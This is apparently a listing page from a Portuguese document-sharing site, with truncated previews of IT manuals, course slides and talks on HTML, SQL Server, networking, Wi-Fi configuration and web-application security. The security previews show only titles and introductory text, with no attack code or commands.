1 2 3 W O R K S H O P 4 5 6 W O R K S H O P 7 W O R K S H O P 8 9 10 Instruções gerais para a realização das Propostas de Actividades Para conhecer em pormenor o INTERFACE DO FRONTPAGE clique aqui 11 CONSTRUÇÃO

Leia mais

Ferramentas para Multimídia e Internet - 1486

Ferramentas para Multimídia e Internet - 1486 1 Ferramentas para Multimídia e Internet - 1486 HTML BÁSICO: O que é uma página WEB? Uma página WEB, também conhecida pelo termo inglês webpage, é uma "página" na World Wide Web, geralmente em formato

Leia mais

Novo Formato de Logins Manual de Consulta

Novo Formato de Logins Manual de Consulta Gestão Integrada de Acessos Novo Formato de Logins Manual de Consulta Gestão Integrada de Acessos Histórico de Alterações Versão Descrição Autor Data 1.0 Versão inicial DSI/PPQ 2014-07-11 Controlo do documento

Leia mais

Worldwide Online TechDay. 30 - Outubro

Worldwide Online TechDay. 30 - Outubro 30 - Outubro 1 Como funciona um banco de dados Microsoft SQL Server? Fabricio Catae Premier Field Engineer Microsoft Certified Master Twitter: @fcatae WebSite: http://blogs.msdn.com/fcatae/ 2 Nossos Parceiros

Leia mais

Redes - Internet. Sumário 26-09-2008. Aula 3,4 e 5 9º C 2008 09 24. } Estrutura baseada em camadas. } Endereços IP. } DNS -Domain Name System

Redes - Internet. Sumário 26-09-2008. Aula 3,4 e 5 9º C 2008 09 24. } Estrutura baseada em camadas. } Endereços IP. } DNS -Domain Name System Redes - Internet 9º C 2008 09 24 Sumário } Estrutura baseada em camadas } Endereços IP } DNS -Domain Name System } Serviços, os Servidores e os Clientes } Informação Distribuída } Principais Serviços da

Leia mais

Segurança em Sistemas Informáticos

Segurança em Sistemas Informáticos Segurança em Sistemas Informáticos Politicas de Segurança Quando é que se torna necessário uma política de segurança? Quando existe um Bem Num espaço partilhado Uma politica de segurança procura garantir

Leia mais

EDUTec Learning. José Paulo Ferreira Lousado

EDUTec Learning. José Paulo Ferreira Lousado EDUTec Learning MANUAL DO UTILIZADOR José Paulo Ferreira Lousado Índice Página Principal... ii Página de Desenvolvimento de Conteúdos... iii Página de Comunicações...iv Página de Transferência de Ficheiros...vi

Leia mais

Manual de procedimentos para ligação à rede sem fios minedu

Manual de procedimentos para ligação à rede sem fios minedu 1 - Configuração no Windows Vista Exemplo de configuração de 802.1x com Certificados de Servidor para o Windows Vista. Antes de iniciar os passos de configuração, verifique se tem a placa Wireless ligada,

Leia mais

Considerando-se a especificação de requisitos de um software, é INCORRETO afirmar que esse documento

Considerando-se a especificação de requisitos de um software, é INCORRETO afirmar que esse documento QUESTÕES DE TI QUESTÃO 16 Considerando-se o número de pontos de função para a estimativa do tamanho de um software, é INCORRETO afirmar que, na contagem de pontos, leva-se em consideração A) as compilações

Leia mais

13 Conectando PHP com MySQL 13.1 Introdução

13 Conectando PHP com MySQL 13.1 Introdução 13 Conectando PHP com MySQL 13.1 Introdução Agora que você já tem uma idéia básica de comandos MySQL, poderemos ver como a linguagem PHP pode interagir com este banco de dados através de inúmeras funções.

Leia mais

Introdução ao ASP.NET

Introdução ao ASP.NET Introdução ao ASP.NET Miguel Isidoro Agenda ASP ASP.NET Server Controls Separação de Código e Apresentação Acesso a Dados Web Services Aplicações Web ASP.NET 1 ASP Razões do Sucesso Modelo de programação

Leia mais

Gabarito - Banco de Dados SQL - 30/07/2013 AULA 01

Gabarito - Banco de Dados SQL - 30/07/2013 AULA 01 Gabarito - Banco de Dados SQL - 30/07/2013 AULA 01 1 1- Bancos de dados compreendem desde agendas telefônicas até sistemas computadorizados. (Sim) 2- Só podemos instalar o SQL Server Express se tivermos

Leia mais

Manual de Configuração

Manual de Configuração Manual de Configuração Acesso Wireless 802.1x da UAC Centro de Informática Universidade dos Açores Versão 2.0 20 de Julho de 2007 Introdução Este manual descreve o processo de configuração de um terminal

Leia mais

Sincronização. Cooperação entre Processos

Sincronização. Cooperação entre Processos Sincronização Parte II Programação Concorrente Cooperação entre Processos Vários processos executam em conjunto uma ou mais tarefas, nas quais Competem por recursos Indicam uns aos outros a: Ausência/existência

Leia mais

Guia de Utilização Configurações acesso à plataforma Linux - Firefox Março 2010 PLATAFORMA ELECTRÓNICA VORTAL

Guia de Utilização Configurações acesso à plataforma Linux - Firefox Março 2010 PLATAFORMA ELECTRÓNICA VORTAL Guia de Utilização Configurações acesso à plataforma Linux - Firefox Março 2010 PLATAFORMA ELECTRÓNICA VORTAL Índice ÍNDICE... 2 1 PRÉ-REQUISITOS DE ACESSO À PLATAFORMA... 3 1.1 - Requisitos Software...

Leia mais

Recomendações de Segurança para Desenvolvimento de Aplicações Web

Recomendações de Segurança para Desenvolvimento de Aplicações Web Recomendações de Segurança para Desenvolvimento de Aplicações Web Índice 1. INTRODUÇÃO...3 1.1 CONTROLE DE VERSÃO...3 1.2 OBJETIVO...3 1.3 PÚBLICO - ALVO...4 2 VULNERABILIDADES COMUNS...4 2.1 INJEÇÃO DE

Leia mais

Segurança da Informação

Segurança da Informação Segurança da Informação Segurança e Vulnerabilidades em Aplicações Web jobona@terra.com.br Definição: Segurança Segundo o dicionário da Wikipédia, o termo segurança significa: 1. Condição ou estado de

Leia mais

Sumário. 1. Instalação GVcollege... 4. 1.1. GVsetup... 4. 1.1.1. Instalação com Banco de dados... 6. 1.2. Configurações... 10

Sumário. 1. Instalação GVcollege... 4. 1.1. GVsetup... 4. 1.1.1. Instalação com Banco de dados... 6. 1.2. Configurações... 10 Sumário 1. Instalação GVcollege... 4 1.1. GVsetup... 4 1.1.1. Instalação com Banco de dados... 6 1.2. Configurações... 10 1.2.1. APS Licence Service... 11 1.2.2. APS Licence File... 11 1.2.3. DBXconfig...

Leia mais

Pen-test de Aplicações Web: Técnicas e Ferramentas

Pen-test de Aplicações Web: Técnicas e Ferramentas Divisão de Informática - DINF MJ Departamento de Polícia Federal Pen-test de Aplicações Web: Técnicas e Ferramentas Ivo de Carvalho Peixinho Perito Criminal Federal Agenda 1. Introdução 2. Ferramentas

Leia mais

LIGAÇÃO à nova rede sem fios REDE minedu. Instruções passo a passo

LIGAÇÃO à nova rede sem fios REDE minedu. Instruções passo a passo LIGAÇÃO à nova rede sem fios REDE minedu Instruções passo a passo PARA QUEM TEM SISTEMA OPERATIVO WINDOWS VISTA Para usar a nova rede é necessário configurar uma nova ligação de rede no computador. Antes

Leia mais

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel

Leia mais

Conceitos Básicos sobre Programação Prática

Conceitos Básicos sobre Programação Prática Conceitos Básicos sobre Programação Prática Programa de computador conjunto de instruções e informação necessários ao alcance de um objectivo instruções + dados normalmente, guardados em ficheiros (em

Leia mais

TeamWork. Manual do Utilizador. Para Windows Vista

TeamWork. Manual do Utilizador. Para Windows Vista TeamWork Manual do Utilizador Para Windows Vista V3.2_Vista Fevereiro 2008 ÍNDICE TeamWork Para que serve... 3 TeamWork Como instalar e configurar... 4 TeamWork Como utilizar... 4 Apoio para instalação

Leia mais

Comunicação de Dados de Autenticação e Credenciais de Acesso para Resposta ao Inquérito

Comunicação de Dados de Autenticação e Credenciais de Acesso para Resposta ao Inquérito Mais informação Acesso ao Sistema de Transferência Electrónica de dados de Inquéritos (STEDI). Onde se acede ao sistema de entrega de Inquéritos? Deverá aceder ao sistema através do site do GEP www.gep.mtss.gov.pt

Leia mais

Segurança em Sistemas Informáticos

Segurança em Sistemas Informáticos Segurança em Sistemas Informáticos Politicas de Segurança Quando é que se torna necessário uma política de segurança? Quando existe um Bem com Valor Se o Bem se situa permanentemente ou temporariamente

Leia mais

Computação II Orientação a Objetos

Computação II Orientação a Objetos Computação II Orientação a Objetos Fabio Mascarenhas - 2014.1 http://www.dcc.ufrj.br/~fabiom/java Introdução Esse não é um curso de Java! O objetivo é aprender os conceitos da programação orientada a objetos,

Leia mais

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br Segurança na Web André Tavares da Silva andre.silva@udesc.br Propósito da Segurança A segurança não é usada simplesmente para proteger contra ataques diretos mas é essencial para estabelecer credibilidade/confiança

Leia mais

1 - Configurar a ligação

1 - Configurar a ligação 1 - Configurar a ligação Abrir o Cx-Programmer e criar um novo ficheiro. Seleccionar o tipo de processador em Device Type CJ1M. Em Device Type - Settings escolher em CPU Type - CPU 12. Em seguida é necessário

Leia mais

INSTALAÇÃO PRINTERTUX Tutorial

INSTALAÇÃO PRINTERTUX Tutorial INSTALAÇÃO PRINTERTUX Tutorial 2 1. O Sistema PrinterTux O Printertux é um sistema para gerenciamento e controle de impressões. O Produto consiste em uma interface web onde o administrador efetua o cadastro

Leia mais

Internet ou Net. É uma rede mundial de computadores ligados entre si através s de linhas telefónicas comuns.

Internet ou Net. É uma rede mundial de computadores ligados entre si através s de linhas telefónicas comuns. Internet Internet ou Net É uma rede mundial de computadores ligados entre si através s de linhas telefónicas comuns. Como Comunicam os computadores Os computadores comunicam entre si utilizando uma linguagem

Leia mais

CÂMARA DE VIGILÂNCIA DE REDE AVANÇADA COM ABÓBODA MANUAL DE INSTALAÇÃO

CÂMARA DE VIGILÂNCIA DE REDE AVANÇADA COM ABÓBODA MANUAL DE INSTALAÇÃO CÂMARA DE VIGILÂNCIA DE REDE AVANÇADA COM ABÓBODA MANUAL DE INSTALAÇÃO Ler estas instruções na sua totalidade antes de colocar em funcionamento e devem ser guardadas para consulta futura. 1. GENERALIDADES

Leia mais

Segurança em Sistemas Informáticos

Segurança em Sistemas Informáticos Segurança em Sistemas Informáticos Politicas de Segurança Quando é que se torna necessário uma política de segurança? Quando existe um Bem Num espaço partilhado Uma politica de segurança procura garantir

Leia mais

Resumo da última aula. Compiladores. Tipos. Regras semânticas. Expressões de tipos. Análise Semântica e checagem de tipos.

Resumo da última aula. Compiladores. Tipos. Regras semânticas. Expressões de tipos. Análise Semântica e checagem de tipos. Resumo da última aula Compiladores Análise semântica Verificação de tipos 1 Implementação: Esquemas S-atribuídos: Mecanismo bottom-up direto Esquemas L-atribuídos: Mecanismo top-down: Necessita gramática

Leia mais